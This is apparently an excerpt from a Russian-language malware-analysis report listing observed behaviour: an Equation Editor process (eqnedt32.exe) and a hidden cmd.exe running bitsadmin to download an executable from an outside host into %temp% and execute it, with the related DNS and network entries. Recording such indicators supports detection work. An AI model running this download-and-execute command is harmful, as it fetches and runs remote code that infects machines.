Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download https://usaupload.com/Tb9 %temp%\Al.Exe&%temp%\Al.Exe
- 'us###load.com':443
- DNS ASK us###load.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download https://usaupload.com/Tb9 %temp%\Al.Exe&%temp%\Al.Exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download https://usaupload.com/Tb9 %TEMP%\Al.Exe